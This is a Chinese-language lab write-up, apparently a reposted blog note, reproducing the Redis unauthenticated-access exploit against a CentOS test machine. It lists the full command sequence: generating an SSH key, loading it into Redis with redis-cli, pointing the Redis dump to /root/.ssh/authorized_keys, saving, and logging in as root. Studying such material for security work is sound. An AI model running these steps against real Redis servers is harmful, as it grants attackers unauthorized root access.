1. redis未授權漏洞復現(寫入公鑰利用)


 先復現一篇公鑰寫入的利用方式,以便明天使用,后續補上其他利用方式。

一、環境准備

  1.靶機環境 CenOS 7 64 redis-2.8.12   192.168.0.111

  2.攻擊機   kail  64 redis-2.8.12     

 

  環境安裝有幾個坑:

  1.靶機安裝redis默認服務端不啟動,需要手動開啟

  附鏈接:https://www.cnblogs.com/williamjie/p/9370196.html  

    進入bin目錄:redis-server /redis-2.8.12/MyConfig/redis.conf  //我自己的目錄啟動方式

  2.kail攻擊機默認不開ssh,沒有.ssh目錄,需要手動操作

  附鏈接:https://blog.csdn.net/weixin_41708020/article/details/106731997

    根據以上鏈接操作,最后執行:ssh localhost  即可生成 .ssh 目錄

  

 

 二、寫入公鑰

  1.  ssh-keygen -t rsa  //執行生成key命令

  

   2.  (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt  //將公鑰寫入txt

   

    這里最好開兩個命令窗,一個在ssh下,一個在redis/src下

  3.  cat /root/.ssh/1.txt | ./redis-cli -h 192.168.0.111 -x set xxx  //將.ssh目錄下的公鑰文件1.txt 通過redis-cli客戶端寫入到目標主機緩沖中

   

 

   4.  ./redis-cli -h 192.168.0.111    //使用客戶端登錄目標

     config set dir /root/.ssh      //設置存儲公鑰路徑

     config set dbfilename authorized_keys  //設置文件名稱

   

 

   5.   get xxx      //查看緩存

      save     //保存緩存到目標主機路徑及文件下

      exit    //退出

  

 

   6. ssh 192.168.0.111  //成功登錄

  

 

 參考連接:

https://blog.csdn.net/Jiajiajiang_/article/details/81368212?from=groupmessage

https://mp.weixin.qq.com/s/Vj24aRbr3P7Pg59HE3SpRQ

      

 

  

 

 

      


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM